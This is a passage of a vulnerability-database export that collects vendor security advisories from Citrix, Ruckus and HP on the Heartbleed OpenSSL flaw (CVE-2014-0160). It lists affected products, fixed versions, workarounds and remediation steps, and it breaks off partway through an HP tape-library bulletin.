OpenSSL. A new version of this software, 8.7.1.27, can be downloaded from the Apple App Store at the following address: <u> <a href=\"https://itunes.apple.com/us/app/worx-home/id434682528?mt=8\">https://itunes.apple.com/us/app/worx-home/id434682528?mt=8</a></u>. Customers that are using wrapped versions of iOS Worx applications are also advised to review the guidance on the MDX Toolkit given above. </span></p>\n<p> <span> <b>\u2022 Receiver for BlackBerry:</b> The Receiver for BlackBerry 10 version 2.0.0.21 is vulnerable to CVE-2014-0160. A new version of the Receiver for BlackBerry 10, 2.0.0.22, can be downloaded from the BlackBerry World website at the following address: <u> <a href=\"http://appworld.blackberry.com/webstore/content/34621918\">http://appworld.blackberry.com/webstore/content/34621918</a></u>. Receiver for PlayBook version 1.0.0 and Receiver for BlackBerry version 2.2 are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Licensing:</b> The Citrix License Server for Windows version 11.11.1, the Citrix License Server VPX version 11.12 and the Citrix Usage Collector are vulnerable to CVE-2015-0160. New versions of the License Server for Windows , 11.11.1.13017, and the License Server VPX, 11.12.14001, can be downloaded from the Citrix website at the following address: <u> <a href=\"https://www.citrix.com/downloads/licensing/license-server.html\">https://www.citrix.com/downloads/licensing/license-server.html</a></u> </span></p>\n<p> <span> <b>\u2022 Citrix CloudPlatform:</b> The TLS interface exposed by the Secondary Storage VM in Cloud Platform versions 4.2.0, 4.2.1-x and 4.3.0.0 use a version of OpenSSL that is vulnerable to CVE-2014-0160. Citrix has released updated system virtual machine templates to resolve this issue. Citrix recommends that customers update the system virtual machine templates to a patched version and then reboot any Secondary Storage VMs to ensure that the updated OpenSSL version is being used. Instructions on updating the system virtual machine templates can be found in the following Citrix knowledge base article <u> <a href=\"https://support.citrix.com/article/CTX200024\">https://support.citrix.com/article/CTX200024</a></u>.</span></p>\n<p> <span> <b>\u2022 Citrix XenClient XT:</b> XenClient XT versions 3.1.4, 3.2.0, and 3.2.1 are vulnerable to CVE-2014-0160. A new version of XenClient XT, 3.2.2, is available on the Citrix website at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-xt-322.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-xt-322.html</a></u>. The XenClient XT Synchronizer makes use of the platform provided OpenSSL library. Customers are advised to verify that the version of OpenSSL installed on the underlying Linux Operating System is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenClient Enterprise:</b> Some versions of XenClient Enterprise Engine are vulnerable to CVE-2014-0160. In deployments where the XenClient Synchronizer is only accessed via fully trusted networks, the level of exposure is reduced. The TLS libraries used by currently supported versions of the XenClient Enterprise Synchronizer are not vulnerable to CVE-2014-0160. The following versions of XenClient Enterprise Engine are vulnerable to CVE-2014-0160: </span></p>\n<p> <span>o 4.1.0, 4.1.1, 4.1.2, 4.1.3, and 4.1.4. Citrix has released a new version of the XenClient Enterprise engine, 4.1.5. This can be found at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-41.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-41.html</a></u></span></p>\n<p> <span>o 4.5.1, 4.5.2, 4.5.3, 4.5.4, and 4.5.5. Citrix has released a new version of the XenClient Enterprise engine, 4.5.6. This can be found at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-45\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-45</a></u></span></p>\n<p> <span>o 5.0.0, 5.0.1, 5.0.2, 5.0.3, 5.0.4 and 5.0.5. Citrix has released a new version of the XenClient Enterprise engine, 5.0.6. This can be found at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-50.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-50.html</a></u></span></p>\n<p> <span>o 5.1.0, and 5.1.1. Citrix has released a new version of XenClient Enterprise, 5.1.2. This can be found at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-51.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-51.html</a></u>. </span></p>\n<p> <span> <b>\u2022 Citrix DesktopPlayer for Mac:</b> DesktopPlayer for Mac version 1.0.x up to and including version 1.0.3 is vulnerable to CVE-2014-0160. A new version of the Desktop Player for Mac, 1.0.4, is available on the Citrix website at the following address: <u> <a href=\"https://www.citrix.com/downloads/desktopplayer-for-mac/product-software/desktopplayer-for-mac-10.html\">https://www.citrix.com/downloads/desktopplayer-for-mac/product-software/desktopplayer-for-mac-10.html</a></u>. The TLS libraries used by currently supported versions of the DesktopPlayer Synchronizer are not vulnerable to CVE-2014-0160.</span></p>\n</ul>\n<p> <span> <b>Products That May Require Third Party Updates:</b></span></p>\n<ul>\n<p> <span> <b>\u2022 Citrix XenDesktop 7.5:</b> Customers deploying Virtual Desktop Agents that are hosted on Citrix CloudPlatform are advised to verify that the volume worker template is using a version of OpenSSL that is not vulnerable to CVE-2014-0160. Setup instructions for the volume worker template on CloudPlatform can be found in the following document: <u> <a href=\"https://support.citrix.com/article/CTX140428\">https://support.citrix.com/article/CTX140428</a></u>. Amazon Web Services based deployments use the Linux AMI template. Guidance from Amazon covering VMs based on this template can be found at the following location: <u> <a href=\"https://aws.amazon.com/amazon-linux-ami/security-bulletins/ALAS-2014-320/\">https://aws.amazon.com/amazon-linux-ami/security-bulletins/ALAS-2014-320/</a></u>. </span></p>\n<p> <span> <b>\u2022 Citrix Receiver for Android:</b> Receiver for Android makes use of the OpenSSL library provided by the underlying Android platform. Citrix advises customers to check with their device vendors to ensure that the underlying Android version is not vulnerable to CVE-2014-0160. An initial statement by Google on Android can be found here: <u> <a href=\"http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html\">http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html</a></u> <a name=\"P43_8077\"></a>.</span></p>\n<p> <span> <b>\u2022 Citrix XenMobile Worx components for Android:</b> Worx components running on Android make use of the OpenSSL library provided by the underlying Android platform. Citrix advises customers to check with their device vendors to ensure that the underlying Android version is not vulnerable to CVE-2014-0160. An initial statement from Google on Android can be found here: <u> <a href=\"http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html\">http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html</a></u>. </span></p>\n<p> <span> <b>\u2022 Citrix Receiver for Linux:</b> The TLS libraries included in currently supported versions of Receiver for Linux are not vulnerable to CVE-2014-0160. Version 13.0 of the Receiver for Linux also makes use of the platform provided OpenSSL library. Customers using this version are advised to ensure that the version of OpenSSL installed on the underlying Linux Operating System is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Web Interface:</b> Web Interface makes use of the TLS functionality provided by the underlying web server. Citrix customers are advised to verify that any deployed web servers used to host Web Interface are not vulnerable to this issue. Web Interface can also use a built-in TLS library to make outgoing TLS connections, this library is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix CloudPortal Business Manager: </b>This product does not include any TLS libraries and, as such, is not vulnerable to CVE-2014-0160. Some customer deployments may make use of an additional SSL proxy component; Citrix advises customers to contact the vendors of any SSL proxy components being used to determine if they are vulnerable to CVE-2014-0160.</span></p>\n</ul>\n<p> <span> <b>Products That Are Not Impacted:</b></span></p>\n<ul>\n<p> <span> <b>\u2022 Citrix Provisioning Services:</b> Currently supported versions of Citrix Provisioning Services are not affected by CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenServer:</b> The TLS libraries used by currently supported versions of XenServer are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix VDI-in-a-Box:</b> The TLS libraries used by currently supported versions of VIAB are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenMobile MDM Edition: </b>The TLS libraries used by components of XenMobile MDM edition, including the XenMobile Device Manager component, are not vulnerable to CVE-2014-0160<b>.</b></span></p>\n<p> <span> <b>\u2022 Citrix CloudPortal Services Manager:</b> The TLS libraries used by currently supported versions of CloudPortal Services Manager are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Receiver for Windows:</b> The TLS libraries used by currently supported versions of Receiver for Windows are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Receiver for Mac:</b> The TLS libraries used by currently supported versions of Receiver for Mac are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Receiver for iOS:</b> The TLS libraries used by currently supported versions of Receiver for iOS are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix ByteMobile: </b>The TLS libraries used by currently supported versions of ByteMobile are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix NetScaler:</b> The TLS libraries used by currently supported versions of the NetScaler product are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Access Gateway</b>:<b> </b>The TLS libraries used by currently supported versions of Access Gateway are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix CloudBridge:</b> The TLS libraries used by currently supported versions of Citrix CloudBridge, including client components, are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Secure Gateway (CSG):</b> The TLS library used by the currently supported version of CSG is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenApp SSLRelay Component:</b> The TLS libraries used by currently supported versions of the XenApp SSLRelay are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Single Sign-on, previously known as Password Manager:</b> The TLS libraries used by currently supported versions of Citrix Single Sign-on are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix StoreFront:</b> The TLS library used by currently supported versions of Citrix Storefront is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Merchandising Server:</b> The TLS library used by the currently supported version of Citrix Merchandising Server is not vulnerable to CVE-2014-0160.</span></p>\n</ul>\n<p> <span> <b>Obtaining Support on This Issue</b></span></p>\n<p> <span>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"http://www.citrix.com/site/ss/supportContacts.asp\">http://www.citrix.com/site/ss/supportContacts.asp</a></u>. More information on the support status of Citrix products can be found on our website at the following address: <u> <a href=\"http://www.citrix.com/support/product-lifecycle/product-matrix.html\">http://www.citrix.com/support/product-lifecycle/product-matrix.html</a></u>.</span></p>\n<p> <span> <b>Reporting Security Vulnerabilities to Citrix</b></span></p>\n<p> <span>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"/article/CTX081743\">Reporting Security Issues to Citrix</a></span></p>\n</div>\n</div></div>\n</section>", "edition": 2, "modified": "2019-08-15T04:00:00", "published": "2014-04-09T04:00:00", "id": "CTX140605", "href": "https://support.citrix.com/article/CTX140605", "title": "CVE-2014-0160 - Citrix Security Advisory for the Heartbleed vulnerability", "type": "citrix", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nRUCKUS ADVISORY ID 041414\r\n\r\nCustomer release date: April 14, 2014\r\nPublic release date: April 14, 2014\r\n\r\nTITLE\r\n\r\nOpenSSL 1.0.1 library's "Heart bleed" vulnerability - CVE-2014-0160\r\n\r\n\r\nSUMMARY\r\n\r\nOpenSSL library is used in Ruckus products to implement various\r\nsecurity related features. A vulnerability has been discovered in\r\nOpenSSL library which may allow an unauthenticated, remote attacker to\r\nretrieve memory in chunks of 64 kilobytes from a connected client or\r\nserver. An exploit could disclose portions of memory containing\r\nsensitive security material such as passwords and private keys.\r\n\r\n\r\nAFFECTED SOFTWARE VERSIONS AND DEVICES\r\n\r\n\r\n Device Affected software\r\n- --------------------- ------------------\r\nSmart Cell Gateway 1.1.x\r\nSmartCell Access Points NOT AFFECTED\r\nZoneDirector Controllers NOT AFFECTED\r\nZoneFlex Access Points NOT AFFECTED\r\n\r\n\r\nAny products or services not mentioned in the table above are not affected\r\n\r\n\r\nDETAILS\r\n\r\nA vulnerability has been discovered in the popular OpenSSL\r\ncryptographic software library. This weakness exists in OpenSSL's\r\nimplementation of the TLS/DTLS (transport layer security protocols)\r\nheartbeat extension (RFC6520). This vulnerability is due to a missing\r\nbounds check in implementation of the handling of the heartbeat\r\nextension. When exploited, this issue may lead to leak of memory\r\ncontents from the server to the client and from the client to the\r\nserver. These memory contents could contain sensitive security\r\nmaterial such as passwords and private keys.\r\n\r\n\r\nIMPACT\r\n\r\nRuckus devices incorporate OpenSSL library to implement various\r\nsecurity related features. Below is list of the affected components:\r\n\r\n- - Administrative HTTPS Interface (Port 8443)\r\n\r\n\r\nCVSS v2 Base Score:5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N)\r\n\r\n\r\n \r\nWORKAROUNDS\r\n\r\nRuckus recommends that all customers apply the appropriate patch(es)\r\nas soon as practical. However, in the event that a patch cannot\r\nimmediately be applied, the following suggestions might help reduce\r\nthe risk:\r\n\r\n - Do not expose administrative interfaces of Ruckus devices to\r\nuntrusted networks such as the Internet.\r\n\r\n - Use a firewall to limit traffic to/from Ruckus device's\r\nadministrative interface to trusted hosts.\r\n\r\n \r\n\r\nSOLUTION\r\n\r\nRuckus recommends that all customers apply the appropriate patch(es)\r\nas soon as practical.\r\n\r\nThe following software builds have the fix (any later builds will also\r\nhave the fix):\r\n\r\n\r\nBranch Software Build\r\n- ------- ------------------\r\n1.1.x 1.1.2.0.142\r\n\r\n\r\n\r\n\r\nDISCOVERY\r\n\r\nThis vulnerability was disclosed online on various sources :\r\n\r\n- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\r\n- - https://www.openssl.org/news/secadv_20140407.txt\r\n- - http://heartbleed.com/\r\n\r\n\r\n\r\n\r\nOBTAINING FIXED FIRMWARE\r\n\r\nRuckus customers can contact Ruckus support to obtain the fixed firmware\r\n\r\nRuckus Support contact list is at:\r\n https://support.ruckuswireless.com/contact-us\r\n\r\n\r\nPUBLIC ANNOUNCEMENTS\r\n\r\nThis security advisory will be made available for public consumption\r\non April 14, 2014 at the following source\r\n\r\nRuckus Website\r\nhttp://www.ruckuswireless.com/security\r\n\r\nSecurityFocus Bugtraq\r\nhttp://www.securityfocus.com/archive/1\r\n\r\n\r\nFuture updates of this advisory, if any, will be placed on Ruckus's\r\nwebsite, but may or may not be actively announced on mailing lists.\r\n\r\nREVISION HISTORY\r\n\r\n Revision 1.0 / 14th April 2014 / Initial release\r\n\r\n\r\nRUCKUS WIRELESS SECURITY PROCEDURES\r\n\r\nComplete information on reporting security vulnerabilities in Ruckus\r\nWireless\r\nproducts, obtaining assistance with security incidents is available at\r\n http://www.ruckuswireless.com/security\r\n \r\n \r\nFor reporting new security issues, email can be sent to\r\nsecurity(at)ruckuswireless.com\r\nFor sensitive information we encourage the use of PGP encryption. Our\r\npublic keys can be\r\nfound at http://www.ruckuswireless.com/security\r\n\r\n \r\nSTATUS OF THIS NOTICE: Final\r\n\r\nAlthough Ruckus cannot guarantee the accuracy of all statements\r\nin this advisory, all of the facts have been checked to the best of our\r\nability. Ruckus does not anticipate issuing updated versions of\r\nthis advisory unless there is some material change in the facts. Should\r\nthere be a significant change in the facts, Ruckus may update this\r\nadvisory.\r\n\r\n\r\n(c) Copyright 2014 by Ruckus Wireless\r\nThis advisory may be redistributed freely after the public release\r\ndate given at\r\nthe top of the text, provided that redistributed copies are complete and\r\nunmodified, including all date and version information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.18 (Darwin)\r\nComment: GPGTools - http://gpgtools.org\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\r\n\r\niQEcBAEBAgAGBQJTTBeuAAoJEFH6g5RLqzh1fRsIAJ9MtudIbdzR7mm/hP0i7boN\r\nMqlHAnFWai1c99UX048I9PSwWzWuEj4/1E4jy4vQqxLG8gO0YbAQiGq4DDGErCU0\r\nAywV+p3Xlcn0SXp0vse/qnhOT0jVOOKXPZSokmoptQXbd28ZOYtGfMJozTvPh2vf\r\nAvGq2B5kciGVhvBc9hdHGhSla/xUr/puIOBKFtNfMuxPujJ62t8g07w2HCB51PL/\r\n5E5MrP4540n3ONZ9+w5h/AeVfvVXsFv25VuElckq6Anzm+iqNRjcWHdync14UqPx\r\n2kXr1E72zRYbY/Z7+QkQuL1REkka+RtGcwbo05u+aEUnPx3E9wvdCHjf6XhxcbI=\r\n=sbsc\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30472", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30472", "title": "RUCKUS ADVISORY ID 041414: OpenSSL 1.0.1 library's "Heart bleed" vulnerability - CVE-2014-0160", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04267775\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04267775\r\nVersion: 1\r\n\r\nHPSBMU03025 rev.1 - HP Diagnostics running OpenSSL, Remote Disclosure of\r\nInformation\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-25\r\nLast Updated: 2014-04-25\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP Diagnostics\r\nrunning OpenSSL. OpenSSL is a 3rd party product that is embedded with some of\r\nHP Software products. This bulletin objective is to notify HP Software\r\ncustomers about products affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101539)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Diagnostics 9.23 and 9.23 IP1\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nCustomers should download the security remediation guidelines from the\r\nfollowing link:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00868126\r\n\r\nHP recommends completing the following action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide. To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 25 April 2014 - Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNavpgACgkQ4B86/C0qfVkj7QCg0J8cRJO9r8wa9JVIHcIZm0Qx\r\nca0AoO/PCAVZUJX7izSERN0LqreLU3ok\r\n=CUx8\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30498", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30498", "title": "[security bulletin] HPSBMU03025 rev.1 - HP Diagnostics running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04250814\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04250814\r\nVersion: 1\r\n\r\nHPSBGN03010 rev.1 - HP Software Server Automation, "HeartBleed" OpenSSL\r\nVulnerability, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-17\r\nLast Updated: 2014-04-17\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101517)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nServer Automation, 10.00, 10.01\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNOTE: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00843314/binary/SA_Alert_\r\nHeartbleed_Vulnerability.pdf\r\n\r\nHP recommends following the Server Automation remediation guidelines and\r\ncompleting the following action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide. To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 17 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNP3uIACgkQ4B86/C0qfVm3kQCgrhhP0/att4M8wopB81/dAlzX\r\nBXMAoOMhgToWBG9l+JKMLuOaORt3BhE1\r\n=J4SK\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30474", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30474", "title": "[security bulletin] HPSBGN03010 rev.1 - HP Software Server Automation, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260637\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260637\r\nVersion: 1\r\n\r\nHPSBST03000 rev.1 - HP StoreEver ESL G3 Tape Library and Enterprise Library\r\nLTO-6 Tape Drives running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-22\r\nLast Updated: 2014-04-22\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP StoreEver ESL\r\nG3 Tape Library 